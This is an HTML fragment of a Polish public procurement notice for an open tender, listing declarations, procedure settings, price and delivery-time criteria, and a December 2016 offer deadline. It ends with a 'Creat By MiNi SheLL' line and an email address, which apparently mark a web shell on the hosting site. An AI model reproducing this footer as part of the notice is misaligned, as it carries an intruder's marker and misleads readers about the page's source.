                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/12/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com